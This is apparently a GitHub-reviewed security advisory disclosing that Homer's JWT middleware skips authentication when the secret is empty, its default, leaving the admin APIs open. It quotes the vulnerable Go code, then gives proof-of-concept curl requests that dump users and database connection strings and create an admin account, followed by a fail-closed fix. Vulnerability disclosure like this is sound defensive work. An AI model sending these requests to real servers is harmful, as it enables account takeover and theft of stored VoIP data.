Both JWT middleware functions (JWTMiddleware and JWTMiddlewareV4) immediately return next(c) when jwtSecret == "". The JWT secret defaults to an empty string. On a default installation, all protected API endpoints under /api/v1, /api/v3, and /api/v4 are completely unauthenticated.
coordinator/handlers/auth.go lines 298-304:
func (h *Auth) JWTMiddleware() echo.MiddlewareFunc {
return func(next echo.HandlerFunc) echo.HandlerFunc {
return func(c echo.Context) error {
if h.jwtSecret == "" {
return next(c) // bypass — no validation performed
}
coordinator/handlers/auth_v4_helpers.go lines 177-182:
func (h *Auth) JWTMiddlewareV4() echo.MiddlewareFunc {
return func(next echo.HandlerFunc) echo.HandlerFunc {
return func(c echo.Context) error {
if h.jwtSecret == "" {
return next(c) // same bypass
coordinator/coordinator.go lines 315-317:
if c.config.JWT.Secret != "" {
protected.Use(authHandler.JWTMiddleware()) // middleware not even registered when secret is empty
}
config/config.go line 845: Secret field struct tag has default:"".
The example config ships a placeholder value, but the Go struct default (used when no config is provided) is empty.
# On a default Homer installation (no JWT secret configured), all protected routes are open:
curl http://<homer-host>/api/v3/users
# Returns full user list with no credentials
curl http://<homer-host>/api/v3/databases
# Returns all database connection strings
curl -X POST http://<homer-host>/api/v3/users \
-H 'Content-Type: application/json' \
-d '{"username":"attacker","password":"pw","partid":10,"usergroup":"admin"}'
# Creates a new admin user with no credentials
Missing Authentication for Critical Function (CWE-306). On a default Homer installation with no JWT secret configured, every admin API endpoint is completely unauthenticated. Attackers can read/write all configuration, users, database connections, and stored VoIP call data.
Fail closed: if JWT.Secret is empty at startup, abort with a fatal error requiring the operator to set a strong secret. Remove the empty-string shortcircuit from both middleware functions:
if h.jwtSecret == "" {
log.Fatal("coordinator.jwt.secret must be set to a non-empty value")
}
If possible, please apply for a CVE number when posting.
{
"cwe_ids": [
"CWE-306"
],
"github_reviewed": true,
"github_reviewed_at": "2026-10-07T16:11:58Z",
"nvd_published_at": null,
"severity": "CRITICAL"
}